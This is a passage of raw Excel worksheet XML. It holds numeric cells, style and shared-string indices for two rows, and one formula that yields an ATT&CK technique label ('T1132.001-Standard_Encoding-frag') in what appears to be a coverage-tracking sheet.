        <v>3</v>
      </c>
      <c r="NX32" s="118" t="s">
        <v>4343</v>
      </c>
      <c r="NY32" s="507">
        <v>3</v>
      </c>
      <c r="NZ32" s="119" t="s">
        <v>4344</v>
      </c>
      <c r="OA32" s="119">
        <v>3</v>
      </c>
      <c r="OB32" s="119">
        <v>2</v>
      </c>
      <c r="OC32" s="120">
        <v>5</v>
      </c>
      <c r="OD32" s="120">
        <v>5</v>
      </c>
      <c r="OE32" s="120">
        <v>4</v>
      </c>
      <c r="OF32" s="121">
        <v>4</v>
      </c>
      <c r="OG32" s="120">
        <v>4</v>
      </c>
      <c r="OH32" s="120">
        <v>4</v>
      </c>
      <c r="OI32" s="120">
        <v>4</v>
      </c>
      <c r="OJ32" s="120">
        <v>4</v>
      </c>
      <c r="OK32" s="383"/>
      <c r="OL32" s="120">
        <v>5</v>
      </c>
      <c r="OM32" s="120">
        <v>5</v>
      </c>
      <c r="ON32" s="120">
        <v>5</v>
      </c>
      <c r="OO32" s="120" t="s">
        <v>3016</v>
      </c>
      <c r="OP32" s="120">
        <v>4</v>
      </c>
      <c r="OQ32" s="464">
        <v>4</v>
      </c>
      <c r="OR32" s="120">
        <v>0</v>
      </c>
      <c r="OS32" s="120">
        <v>0</v>
      </c>
      <c r="OT32" s="120">
        <v>0</v>
      </c>
      <c r="OU32" s="120"/>
      <c r="OV32" s="120">
        <v>0</v>
      </c>
      <c r="OW32" s="464">
        <v>0</v>
      </c>
      <c r="OX32" s="120">
        <v>0</v>
      </c>
      <c r="OY32" s="120">
        <v>0</v>
      </c>
      <c r="OZ32" s="120">
        <v>0</v>
      </c>
      <c r="PA32" s="120"/>
      <c r="PB32" s="120">
        <v>0</v>
      </c>
      <c r="PC32" s="464">
        <v>0</v>
      </c>
      <c r="PD32" s="120">
        <v>0</v>
      </c>
      <c r="PE32" s="120">
        <v>0</v>
      </c>
      <c r="PF32" s="120">
        <v>0</v>
      </c>
      <c r="PG32" s="120"/>
      <c r="PH32" s="120">
        <v>0</v>
      </c>
      <c r="PI32" s="464">
        <v>0</v>
      </c>
      <c r="PJ32" s="120">
        <v>0</v>
      </c>
      <c r="PK32" s="120">
        <v>0</v>
      </c>
      <c r="PL32" s="120">
        <v>0</v>
      </c>
      <c r="PM32" s="120"/>
      <c r="PN32" s="120">
        <v>0</v>
      </c>
      <c r="PO32" s="464">
        <v>0</v>
      </c>
      <c r="PP32" s="120">
        <v>1</v>
      </c>
      <c r="PQ32" s="120">
        <v>1</v>
      </c>
      <c r="PR32" s="120">
        <v>1</v>
      </c>
      <c r="PS32" s="120" t="s">
        <v>2517</v>
      </c>
      <c r="PT32" s="120">
        <v>1</v>
      </c>
      <c r="PU32" s="464">
        <v>1</v>
      </c>
      <c r="PV32" s="120">
        <v>1</v>
      </c>
      <c r="PW32" s="120">
        <v>1</v>
      </c>
      <c r="PX32" s="120">
        <v>1</v>
      </c>
      <c r="PY32" s="120" t="s">
        <v>3017</v>
      </c>
      <c r="PZ32" s="120">
        <v>1</v>
      </c>
      <c r="QA32" s="464">
        <v>1</v>
      </c>
      <c r="QB32" s="120">
        <v>1</v>
      </c>
      <c r="QC32" s="120">
        <v>1</v>
      </c>
      <c r="QD32" s="120">
        <v>1</v>
      </c>
      <c r="QE32" s="120" t="s">
        <v>2541</v>
      </c>
      <c r="QF32" s="120">
        <v>1</v>
      </c>
      <c r="QG32" s="464">
        <v>1</v>
      </c>
      <c r="QH32" s="120">
        <v>2</v>
      </c>
      <c r="QI32" s="120">
        <v>2</v>
      </c>
      <c r="QJ32" s="120">
        <v>2</v>
      </c>
      <c r="QK32" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL32" s="120">
        <v>1</v>
      </c>
      <c r="QM32" s="464">
        <v>2</v>
      </c>
      <c r="QN32" s="120">
        <v>0</v>
      </c>
      <c r="QO32" s="120">
        <v>0</v>
      </c>
      <c r="QP32" s="120">
        <v>0</v>
      </c>
      <c r="QQ32" s="120"/>
      <c r="QR32" s="120">
        <v>0</v>
      </c>
      <c r="QS32" s="464">
        <v>0</v>
      </c>
      <c r="QT32" s="184"/>
      <c r="QU32" s="184"/>
      <c r="QV32" s="184"/>
      <c r="QW32" s="184"/>
      <c r="QX32" s="184"/>
      <c r="QY32" s="184"/>
      <c r="QZ32" s="184"/>
      <c r="RA32" s="184"/>
      <c r="RB32" s="184"/>
      <c r="RC32" s="184"/>
      <c r="RD32" s="184"/>
      <c r="RE32" s="184"/>
      <c r="RF32" s="184"/>
      <c r="RG32" s="184"/>
      <c r="RH32" s="184"/>
      <c r="RI32" s="184"/>
      <c r="RJ32" s="184"/>
      <c r="RK32" s="184"/>
      <c r="RL32" s="184"/>
      <c r="RM32" s="184"/>
      <c r="RN32" s="184"/>
      <c r="RO32" s="184"/>
      <c r="RP32" s="184"/>
      <c r="RQ32" s="184"/>
      <c r="RR32" s="184"/>
      <c r="RS32" s="184"/>
      <c r="RT32" s="184"/>
      <c r="RU32" s="184"/>
      <c r="RV32" s="184"/>
      <c r="RW32" s="184"/>
      <c r="RX32" s="184"/>
      <c r="RY32" s="184"/>
      <c r="RZ32" s="184"/>
      <c r="SA32" s="184"/>
      <c r="SB32" s="184"/>
      <c r="SC32" s="184"/>
      <c r="SD32" s="184"/>
      <c r="SE32" s="184"/>
      <c r="SF32" s="184"/>
      <c r="SG32" s="184"/>
      <c r="SH32" s="184"/>
      <c r="SI32" s="184"/>
      <c r="SJ32" s="184"/>
      <c r="SK32" s="184"/>
      <c r="SL32" s="184"/>
      <c r="SM32" s="184"/>
      <c r="SN32" s="184"/>
      <c r="SO32" s="184"/>
      <c r="SP32" s="184"/>
      <c r="SQ32" s="184"/>
      <c r="SR32" s="184"/>
      <c r="SS32" s="184"/>
      <c r="ST32" s="184"/>
      <c r="SU32" s="184"/>
      <c r="SV32" s="184"/>
      <c r="SW32" s="184"/>
      <c r="SX32" s="184"/>
      <c r="SY32" s="184"/>
      <c r="SZ32" s="184"/>
      <c r="TA32" s="184"/>
      <c r="TB32" s="184"/>
      <c r="TC32" s="184"/>
      <c r="TD32" s="184"/>
      <c r="TE32" s="184"/>
      <c r="TF32" s="184"/>
      <c r="TG32" s="184"/>
      <c r="TH32" s="184"/>
      <c r="TI32" s="184"/>
      <c r="TJ32" s="184"/>
      <c r="TK32" s="184"/>
      <c r="TL32" s="184"/>
      <c r="TM32" s="184"/>
      <c r="TN32" s="184"/>
      <c r="TO32" s="184"/>
      <c r="TP32" s="184"/>
      <c r="TQ32" s="184"/>
      <c r="TR32" s="184"/>
      <c r="TS32" s="184"/>
      <c r="TT32" s="184"/>
      <c r="TU32" s="184"/>
      <c r="TV32" s="184"/>
      <c r="TW32" s="184"/>
      <c r="TX32" s="184"/>
      <c r="TY32" s="184"/>
      <c r="TZ32" s="184"/>
      <c r="UA32" s="184"/>
      <c r="UB32" s="184"/>
      <c r="UC32" s="184"/>
      <c r="UD32" s="184"/>
      <c r="UE32" s="184"/>
      <c r="UF32" s="184"/>
      <c r="UG32" s="184"/>
      <c r="UH32" s="184"/>
      <c r="UI32" s="184"/>
      <c r="UJ32" s="184"/>
      <c r="UK32" s="184"/>
      <c r="UL32" s="184"/>
      <c r="UM32" s="184"/>
      <c r="UN32" s="184"/>
      <c r="UO32" s="184"/>
      <c r="UP32" s="184"/>
      <c r="UQ32" s="184"/>
      <c r="UR32" s="184"/>
      <c r="US32" s="184"/>
      <c r="UT32" s="184"/>
      <c r="UU32" s="184"/>
      <c r="UV32" s="184"/>
      <c r="UW32" s="184"/>
      <c r="UX32" s="184"/>
      <c r="UY32" s="184"/>
      <c r="UZ32" s="184"/>
      <c r="VA32" s="184"/>
      <c r="VB32" s="184"/>
      <c r="VC32" s="184"/>
      <c r="VD32" s="184"/>
      <c r="VE32" s="184"/>
      <c r="VF32" s="184"/>
      <c r="VG32" s="184"/>
      <c r="VH32" s="184"/>
      <c r="VI32" s="184"/>
      <c r="VJ32" s="184"/>
      <c r="VK32" s="184"/>
      <c r="VL32" s="184"/>
      <c r="VM32" s="184"/>
      <c r="VN32" s="184"/>
      <c r="VO32" s="184"/>
      <c r="VP32" s="184"/>
      <c r="VQ32" s="184"/>
      <c r="VR32" s="184"/>
      <c r="VS32" s="184"/>
      <c r="VT32" s="184"/>
      <c r="VU32" s="184"/>
      <c r="VV32" s="184"/>
      <c r="VW32" s="184"/>
      <c r="VX32" s="184"/>
      <c r="VY32" s="184"/>
    </row>
    <row r="33" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A33" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B33" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C33" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D33" s="83" t="s">
        <v>70</v>
      </c>
      <c r="E33" s="83">
        <f t="shared" si="2"/>
        <v>27</v>
      </c>
      <c r="F33" s="83" t="s">
        <v>71</v>
      </c>
      <c r="G33" s="83" t="s">
        <v>1055</v>
      </c>
      <c r="H33" s="83" t="s">
        <v>1056</v>
      </c>
      <c r="I33" s="81" t="s">
        <v>1057</v>
      </c>
      <c r="J33" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K33" s="81" t="s">
        <v>1058</v>
      </c>
      <c r="L33" s="81" t="s">
        <v>1059</v>
      </c>
      <c r="M33" s="378" t="s">
        <v>207</v>
      </c>
      <c r="N33" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O33" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P33" s="91"/>
      <c r="Q33" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R33" s="92" t="s">
        <v>1060</v>
      </c>
      <c r="S33" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T33" s="92" t="s">
        <v>1061</v>
      </c>
      <c r="U33" s="94" t="s">
        <v>1062</v>
      </c>
      <c r="V33" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W33" s="96" t="s">
        <v>1063</v>
      </c>
      <c r="X33" s="196" t="s">
        <v>1064</v>
      </c>
      <c r="Y33" s="83" t="s">
        <v>1065</v>
      </c>
      <c r="Z33" s="188" t="s">
        <v>1066</v>
      </c>
      <c r="AA33" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB33" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC33" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD33" s="83"/>
      <c r="AE33" s="83"/>
      <c r="AF33" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG33" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH33" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI33" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ33" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK33" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL33" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM33" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN33" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO33" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP33" s="385" t="str">
        <f>M33&amp;"-frag"</f>
        <v>T1132.001-Standard_Encoding-frag</v>
      </c>
      <c r="AQ33" s="358">
        <v>10</v>
      </c>
      <c r="AR33" s="100"/>
      <c r="AS33" s="100">
        <v>5</v>
      </c>
      <c r="AT33" s="100">
        <v>1</v>
      </c>
      <c r="AU33" s="100">
        <v>6</v>
      </c>
      <c r="AV33" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW33" s="100">
        <v>5</v>
      </c>
      <c r="AX33" s="100">
        <v>5</v>
      </c>
      <c r="AY33" s="100">
        <v>0</v>
      </c>
      <c r="AZ33" s="100">
        <v>5</v>
      </c>
      <c r="BA33" s="381" t="s">
        <v>4880</v>
      </c>
      <c r="BB33" s="101">
        <v>1</v>
      </c>
      <c r="BC33" s="102" t="s">
        <v>1796</v>
      </c>
      <c r="BD33" s="102">
        <v>1</v>
      </c>
      <c r="BE33" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF33" s="103">
        <v>1</v>
      </c>
      <c r="BG33" s="104">
        <v>1</v>
      </c>
      <c r="BH33" s="105">
        <v>11</v>
      </c>
      <c r="BI33" s="106" t="s">
        <v>3018</v>
      </c>
      <c r="BJ33" s="497">
        <v>11</v>
      </c>
      <c r="BK33" s="107" t="s">
        <v>3019</v>
      </c>
      <c r="BL33" s="107">
        <v>3</v>
      </c>
      <c r="BM33" s="108">
        <v>6</v>
      </c>
      <c r="BN33" s="109">
        <v>12</v>
      </c>
      <c r="BO33" s="110" t="s">
        <v>2004</v>
      </c>
      <c r="BP33" s="501">
        <v>12</v>
      </c>
      <c r="BQ33" s="111" t="s">
        <v>2005</v>
      </c>
      <c r="BR33" s="111">
        <v>4</v>
      </c>
      <c r="BS33" s="112">
        <v>6</v>
      </c>
      <c r="BT33" s="113">
        <v>6</v>
      </c>
      <c r="BU33" s="114" t="s">
        <v>3020</v>
      </c>
      <c r="BV33" s="503">
        <v>6</v>
      </c>
      <c r="BW33" s="115" t="s">
        <v>3021</v>
      </c>
      <c r="BX33" s="115">
        <v>2</v>
      </c>
      <c r="BY33" s="116">
        <v>6</v>
      </c>
      <c r="BZ33" s="250">
        <v>20</v>
      </c>
      <c r="CA33" s="251" t="s">
        <v>3022</v>
      </c>
      <c r="CB33" s="505">
        <v>18</v>
      </c>
      <c r="CC33" s="252" t="s">
        <v>3023</v>
      </c>
      <c r="CD33" s="252">
        <v>6</v>
      </c>
      <c r="CE33" s="253">
        <v>6</v>
      </c>
      <c r="CF33" s="101">
        <v>26</v>
      </c>
      <c r="CG33" s="102" t="s">
        <v>3024</v>
      </c>
      <c r="CH33" s="102">
        <v>24</v>
      </c>
      <c r="CI33" s="103" t="s">
        <v>3025</v>
      </c>
      <c r="CJ33" s="103">
        <v>8</v>
      </c>
      <c r="CK33" s="104">
        <v>6</v>
      </c>
      <c r="CL33" s="105">
        <v>0</v>
      </c>
      <c r="CM33" s="106">
        <v>0</v>
      </c>
      <c r="CN33" s="497">
        <v>0</v>
      </c>
      <c r="CO33" s="107">
        <v>0</v>
      </c>
      <c r="CP33" s="107">
        <v>0</v>
      </c>
      <c r="CQ33" s="108">
        <v>0</v>
      </c>
      <c r="CR33" s="109">
        <v>0</v>
      </c>
      <c r="CS33" s="110">
        <v>0</v>
      </c>
      <c r="CT33" s="501">
        <v>0</v>
      </c>
      <c r="CU33" s="111">
        <v>0</v>
      </c>
      <c r="CV33" s="111">
        <v>0</v>
      </c>
      <c r="CW33" s="112">
        <v>0</v>
      </c>
      <c r="CX33" s="113">
        <v>12</v>
      </c>
      <c r="CY33" s="114" t="s">
        <v>2004</v>
      </c>
      <c r="CZ33" s="503">
        <v>12</v>
      </c>
      <c r="DA33" s="115" t="s">
        <v>2005</v>
      </c>
      <c r="DB33" s="115">
        <v>4</v>
      </c>
      <c r="DC33" s="116">
        <v>6</v>
      </c>
      <c r="DD33" s="101">
        <v>0</v>
      </c>
      <c r="DE33" s="102">
        <v>0</v>
      </c>
      <c r="DF33" s="102">
        <v>0</v>
      </c>
      <c r="DG33" s="103">
        <v>0</v>
      </c>
      <c r="DH33" s="103">
        <v>0</v>
      </c>
      <c r="DI33" s="104">
        <v>0</v>
      </c>
      <c r="DJ33" s="105">
        <v>1</v>
      </c>
      <c r="DK33" s="106" t="s">
        <v>1842</v>
      </c>
      <c r="DL33" s="497">
        <v>1</v>
      </c>
      <c r="DM33" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="DN33" s="107">
        <v>1</v>
      </c>
      <c r="DO33" s="108">
        <v>1</v>
      </c>
      <c r="DP33" s="109">
        <v>1</v>
      </c>
      <c r="DQ33" s="110" t="s">
        <v>1842</v>
      </c>
      <c r="DR33" s="501">
        <v>1</v>
      </c>
      <c r="DS33" s="111" t="s">
        <v>1843</v>
      </c>
      <c r="DT33" s="111">
        <v>1</v>
      </c>
      <c r="DU33" s="112">
        <v>1</v>
      </c>
      <c r="DV33" s="113">
        <v>5</v>
      </c>
      <c r="DW33" s="114" t="s">
        <v>2729</v>
      </c>
      <c r="DX33" s="503">
        <v>5</v>
      </c>
      <c r="DY33" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ33" s="115">
        <v>1</v>
      </c>
      <c r="EA33" s="116">
        <v>5</v>
      </c>
      <c r="EB33" s="250">
        <v>1</v>
      </c>
      <c r="EC33" s="251" t="s">
        <v>1842</v>
      </c>
      <c r="ED33" s="505">
        <v>1</v>
      </c>
      <c r="EE33" s="252" t="s">
        <v>1843</v>
      </c>
      <c r="EF33" s="252">
        <v>1</v>
      </c>
      <c r="EG33" s="253">
        <v>1</v>
      </c>
      <c r="EH33" s="101">
        <v>6</v>
      </c>
      <c r="EI33" s="102" t="s">
        <v>3026</v>
      </c>
      <c r="EJ33" s="102">
        <v>6</v>
      </c>
      <c r="EK33" s="103" t="s">
        <v>3027</v>
      </c>
      <c r="EL33" s="103">
        <v>2</v>
      </c>
      <c r="EM33" s="104">
        <v>6</v>
      </c>
      <c r="EN33" s="105">
        <v>0</v>
      </c>
      <c r="EO33" s="106">
        <v>0</v>
      </c>
      <c r="EP33" s="497">
        <v>0</v>
      </c>
      <c r="EQ33" s="107">
        <v>0</v>
      </c>
      <c r="ER33" s="107">
        <v>0</v>
      </c>
      <c r="ES33" s="108">
        <v>0</v>
      </c>
      <c r="ET33" s="109">
        <v>0</v>
      </c>
      <c r="EU33" s="110">
        <v>0</v>
      </c>
      <c r="EV33" s="501">
        <v>0</v>
      </c>
      <c r="EW33" s="111">
        <v>0</v>
      </c>
      <c r="EX33" s="111">
        <v>0</v>
      </c>
      <c r="EY33" s="112">
        <v>0</v>
      </c>
      <c r="EZ33" s="113">
        <v>1</v>
      </c>
      <c r="FA33" s="114" t="s">
        <v>1842</v>
      </c>
      <c r="FB33" s="503">
        <v>1</v>
      </c>
      <c r="FC33" s="115" t="s">
        <v>1843</v>
      </c>
      <c r="FD33" s="115">
        <v>1</v>
      </c>
      <c r="FE33" s="116">
        <v>1</v>
      </c>
      <c r="FF33" s="101">
        <v>1</v>
      </c>
      <c r="FG33" s="102" t="s">
        <v>1796</v>
      </c>
      <c r="FH33" s="102">
        <v>1</v>
      </c>
      <c r="FI33" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ33" s="103">
        <v>1</v>
      </c>
      <c r="FK33" s="104">
        <v>1</v>
      </c>
      <c r="FL33" s="105">
        <v>10</v>
      </c>
      <c r="FM33" s="106" t="s">
        <v>3028</v>
      </c>
      <c r="FN33" s="497">
        <v>10</v>
      </c>
      <c r="FO33" s="107" t="s">
        <v>1856</v>
      </c>
      <c r="FP33" s="107">
        <v>2</v>
      </c>
      <c r="FQ33" s="108">
        <v>5</v>
      </c>
      <c r="FR33" s="109">
        <v>11</v>
      </c>
      <c r="FS33" s="110" t="s">
        <v>3029</v>
      </c>
      <c r="FT33" s="501">
        <v>11</v>
      </c>
      <c r="FU33" s="111" t="s">
        <v>3030</v>
      </c>
      <c r="FV33" s="111">
        <v>3</v>
      </c>
      <c r="FW33" s="112">
        <v>6</v>
      </c>
      <c r="FX33" s="113">
        <v>1</v>
      </c>
      <c r="FY33" s="114" t="s">
        <v>1796</v>
      </c>
      <c r="FZ33" s="503">
        <v>1</v>
      </c>
      <c r="GA33" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB33" s="115">
        <v>1</v>
      </c>
      <c r="GC33" s="116">
        <v>1</v>
      </c>
      <c r="GD33" s="250">
        <v>19</v>
      </c>
      <c r="GE33" s="251" t="s">
        <v>3031</v>
      </c>
      <c r="GF33" s="505">
        <v>17</v>
      </c>
      <c r="GG33" s="252" t="s">
        <v>1908</v>
      </c>
      <c r="GH33" s="252">
        <v>5</v>
      </c>
      <c r="GI33" s="253">
        <v>6</v>
      </c>
      <c r="GJ33" s="101">
        <v>20</v>
      </c>
      <c r="GK33" s="102" t="s">
        <v>3032</v>
      </c>
      <c r="GL33" s="102">
        <v>18</v>
      </c>
      <c r="GM33" s="103" t="s">
        <v>3033</v>
      </c>
      <c r="GN33" s="103">
        <v>6</v>
      </c>
      <c r="GO33" s="104">
        <v>6</v>
      </c>
      <c r="GP33" s="105">
        <v>0</v>
      </c>
      <c r="GQ33" s="106">
        <v>0</v>
      </c>
      <c r="GR33" s="497">
        <v>0</v>
      </c>
      <c r="GS33" s="107">
        <v>0</v>
      </c>
      <c r="GT33" s="107">
        <v>0</v>
      </c>
      <c r="GU33" s="108">
        <v>0</v>
      </c>
      <c r="GV33" s="109">
        <v>0</v>
      </c>
      <c r="GW33" s="110">
        <v>0</v>
      </c>
      <c r="GX33" s="501">
        <v>0</v>
      </c>
      <c r="GY33" s="111">
        <v>0</v>
      </c>
      <c r="GZ33" s="111">
        <v>0</v>
      </c>
      <c r="HA33" s="112">
        <v>0</v>
      </c>
      <c r="HB33" s="113">
        <v>11</v>
      </c>
      <c r="HC33" s="114" t="s">
        <v>3029</v>
      </c>
      <c r="HD33" s="503">
        <v>11</v>
      </c>
      <c r="HE33" s="115" t="s">
        <v>3030</v>
      </c>
      <c r="HF33" s="115">
        <v>3</v>
      </c>
      <c r="HG33" s="116">
        <v>6</v>
      </c>
      <c r="HH33" s="101">
        <v>0</v>
      </c>
      <c r="HI33" s="102">
        <v>0</v>
      </c>
      <c r="HJ33" s="102">
        <v>0</v>
      </c>
      <c r="HK33" s="103">
        <v>0</v>
      </c>
      <c r="HL33" s="103">
        <v>0</v>
      </c>
      <c r="HM33" s="104">
        <v>0</v>
      </c>
      <c r="HN33" s="105">
        <v>0</v>
      </c>
      <c r="HO33" s="106">
        <v>0</v>
      </c>
      <c r="HP33" s="497">
        <v>0</v>
      </c>
      <c r="HQ33" s="107">
        <v>0</v>
      </c>
      <c r="HR33" s="107">
        <v>0</v>
      </c>
      <c r="HS33" s="108">
        <v>0</v>
      </c>
      <c r="HT33" s="109">
        <v>0</v>
      </c>
      <c r="HU33" s="110">
        <v>0</v>
      </c>
      <c r="HV33" s="501">
        <v>0</v>
      </c>
      <c r="HW33" s="111">
        <v>0</v>
      </c>
      <c r="HX33" s="111">
        <v>0</v>
      </c>
      <c r="HY33" s="112">
        <v>0</v>
      </c>
      <c r="HZ33" s="113">
        <v>0</v>
      </c>
      <c r="IA33" s="114">
        <v>0</v>
      </c>
      <c r="IB33" s="503">
        <v>0</v>
      </c>
      <c r="IC33" s="115">
        <v>0</v>
      </c>
      <c r="ID33" s="115">
        <v>0</v>
      </c>
      <c r="IE33" s="116">
        <v>0</v>
      </c>
      <c r="IF33" s="250">
        <v>0</v>
      </c>
      <c r="IG33" s="251">
        <v>0</v>
      </c>
      <c r="IH33" s="505">
        <v>0</v>
      </c>
      <c r="II33" s="252">
        <v>0</v>
      </c>
      <c r="IJ33" s="252">
        <v>0</v>
      </c>
      <c r="IK33" s="253">
        <v>0</v>
      </c>
      <c r="IL33" s="101">
        <v>0</v>
      </c>
      <c r="IM33" s="102">
        <v>0</v>
      </c>
      <c r="IN33" s="102">
        <v>0</v>
      </c>
      <c r="IO33" s="103">
        <v>0</v>
      </c>
      <c r="IP33" s="103">
        <v>0</v>
      </c>
      <c r="IQ33" s="104">
        <v>0</v>
      </c>
      <c r="IR33" s="105">
        <v>0</v>
      </c>
      <c r="IS33" s="106">
        <v>0</v>
      </c>
      <c r="IT33" s="497">
        <v>0</v>
      </c>
      <c r="IU33" s="107">
        <v>0</v>
      </c>
      <c r="IV33" s="107">
        <v>0</v>
      </c>
      <c r="IW33" s="108">
        <v>0</v>
      </c>
      <c r="IX33" s="109">
        <v>0</v>
      </c>
      <c r="IY33" s="110">
        <v>0</v>
      </c>
      <c r="IZ33" s="501">
        <v>0</v>
      </c>
      <c r="JA33" s="111">
        <v>0</v>
      </c>
      <c r="JB33" s="111">
        <v>0</v>
      </c>
      <c r="JC33" s="112">
        <v>0</v>
      </c>
      <c r="JD33" s="113">
        <v>0</v>
      </c>
      <c r="JE33" s="114">
        <v>0</v>
      </c>
      <c r="JF33" s="503">
        <v>0</v>
      </c>
      <c r="JG33" s="115">
        <v>0</v>
      </c>
      <c r="JH33" s="115">
        <v>0</v>
      </c>
      <c r="JI33" s="116">
        <v>0</v>
      </c>
      <c r="JJ33" s="101">
        <v>0</v>
      </c>
      <c r="JK33" s="102">
        <v>0</v>
      </c>
      <c r="JL33" s="102">
        <v>0</v>
      </c>
      <c r="JM33" s="103">
        <v>0</v>
      </c>
      <c r="JN33" s="103">
        <v>0</v>
      </c>
      <c r="JO33" s="104">
        <v>0</v>
      </c>
      <c r="JP33" s="105">
        <v>0</v>
      </c>
      <c r="JQ33" s="106">
        <v>0</v>
      </c>
      <c r="JR33" s="497">
        <v>0</v>
      </c>
      <c r="JS33" s="107">
        <v>0</v>
      </c>
      <c r="JT33" s="107">
        <v>0</v>
      </c>
      <c r="JU33" s="108">
        <v>0</v>
      </c>
      <c r="JV33" s="109">
        <v>0</v>
      </c>
      <c r="JW33" s="110">
        <v>0</v>
      </c>
      <c r="JX33" s="501">
        <v>0</v>
      </c>
      <c r="JY33" s="111">
        <v>0</v>
      </c>
      <c r="JZ33" s="111">
        <v>0</v>
      </c>
      <c r="KA33" s="112">
        <v>0</v>
      </c>
      <c r="KB33" s="113">
        <v>0</v>
      </c>
      <c r="KC33" s="114">
        <v>0</v>
      </c>
      <c r="KD33" s="503">
        <v>0</v>
      </c>
      <c r="KE33" s="115">
        <v>0</v>
      </c>
      <c r="KF33" s="115">
        <v>0</v>
      </c>
      <c r="KG33" s="116">
        <v>0</v>
      </c>
      <c r="KH33" s="250">
        <v>0</v>
      </c>
      <c r="KI33" s="251">
        <v>0</v>
      </c>
      <c r="KJ33" s="505">
        <v>0</v>
      </c>
      <c r="KK33" s="252">
        <v>0</v>
      </c>
      <c r="KL33" s="252">
        <v>0</v>
      </c>
      <c r="KM33" s="253">
        <v>0</v>
      </c>
      <c r="KN33" s="101">
        <v>0</v>
      </c>
      <c r="KO33" s="102">
        <v>0</v>
      </c>
      <c r="KP33" s="102">
        <v>0</v>
      </c>
      <c r="KQ33" s="103">
        <v>0</v>
      </c>
      <c r="KR33" s="103">
        <v>0</v>
      </c>
      <c r="KS33" s="104">
        <v>0</v>
      </c>
      <c r="KT33" s="105">
        <v>0</v>
      </c>
      <c r="KU33" s="106">
        <v>0</v>
      </c>
      <c r="KV33" s="497">
        <v>0</v>
      </c>
      <c r="KW33" s="107">
        <v>0</v>
      </c>
      <c r="KX33" s="107">
        <v>0</v>
      </c>
      <c r="KY33" s="108">
        <v>0</v>
      </c>
      <c r="KZ33" s="109">
        <v>0</v>
      </c>
      <c r="LA33" s="110">
        <v>0</v>
      </c>
      <c r="LB33" s="501">
        <v>0</v>
      </c>
      <c r="LC33" s="111">
        <v>0</v>
      </c>
      <c r="LD33" s="111">
        <v>0</v>
      </c>
      <c r="LE33" s="112">
        <v>0</v>
      </c>
      <c r="LF33" s="113">
        <v>0</v>
      </c>
      <c r="LG33" s="114">
        <v>0</v>
      </c>
      <c r="LH33" s="503">
        <v>0</v>
      </c>
      <c r="LI33" s="115">
        <v>0</v>
      </c>
      <c r="LJ33" s="115">
        <v>0</v>
      </c>
      <c r="LK33" s="116">
        <v>0</v>
      </c>
      <c r="LL33" s="117">
        <v>10</v>
      </c>
      <c r="LM33" s="507">
        <v>10</v>
      </c>
      <c r="LN33" s="119">
        <v>2</v>
      </c>
      <c r="LO33" s="119">
        <v>3</v>
      </c>
      <c r="LP33" s="119">
        <v>9</v>
      </c>
      <c r="LQ33" s="119">
        <v>1</v>
      </c>
      <c r="LR33" s="119">
        <v>8</v>
      </c>
      <c r="LS33" s="119">
        <v>9</v>
      </c>
      <c r="LT33" s="382"/>
      <c r="LU33" s="117">
        <v>0</v>
      </c>
      <c r="LV33" s="118">
        <v>0</v>
      </c>
      <c r="LW33" s="507">
        <v>0</v>
      </c>
      <c r="LX33" s="119">
        <v>0</v>
      </c>
      <c r="LY33" s="119">
        <v>0</v>
      </c>
      <c r="LZ33" s="119">
        <v>0</v>
      </c>
      <c r="MA33" s="117">
        <v>0</v>
      </c>
      <c r="MB33" s="118">
        <v>0</v>
      </c>
      <c r="MC33" s="507">
        <v>0</v>
      </c>
      <c r="MD33" s="119">
        <v>0</v>
      </c>
      <c r="ME33" s="119">
        <v>0</v>
      </c>
      <c r="MF33" s="119">
        <v>0</v>
      </c>
      <c r="MG33" s="117">
        <v>0</v>
      </c>
      <c r="MH33" s="118">
        <v>0</v>
      </c>
      <c r="MI33" s="507">
        <v>0</v>
      </c>
      <c r="MJ33" s="119">
        <v>0</v>
      </c>
      <c r="MK33" s="119">
        <v>0</v>
      </c>
      <c r="ML33" s="119">
        <v>0</v>
      </c>
      <c r="MM33" s="117">
        <v>0</v>
      </c>
      <c r="MN33" s="118">
        <v>0</v>
      </c>
      <c r="MO33" s="507">
        <v>0</v>
      </c>
      <c r="MP33" s="119">
        <v>0</v>
      </c>
      <c r="MQ33" s="119">
        <v>0</v>
      </c>
      <c r="MR33" s="119">
        <v>0</v>
      </c>
      <c r="MS33" s="117">
        <v>2</v>
      </c>
      <c r="MT33" s="118" t="s">
        <v>4201</v>
      </c>
      <c r="MU33" s="507">
        <v>2</v>
      </c>
      <c r="MV33" s="119" t="s">
        <v>4165</v>
      </c>
      <c r="MW33" s="119">
        <v>2</v>
      </c>
      <c r="MX33" s="119">
        <v>1</v>
      </c>
      <c r="MY33" s="117">
        <v>0</v>
      </c>
      <c r="MZ33" s="118">
        <v>0</v>
      </c>
      <c r="NA33" s="507">
        <v>0</v>
      </c>
      <c r="NB33" s="119">
        <v>0</v>
      </c>
      <c r="NC33" s="119">
        <v>0</v>
      </c>
      <c r="ND33" s="119">
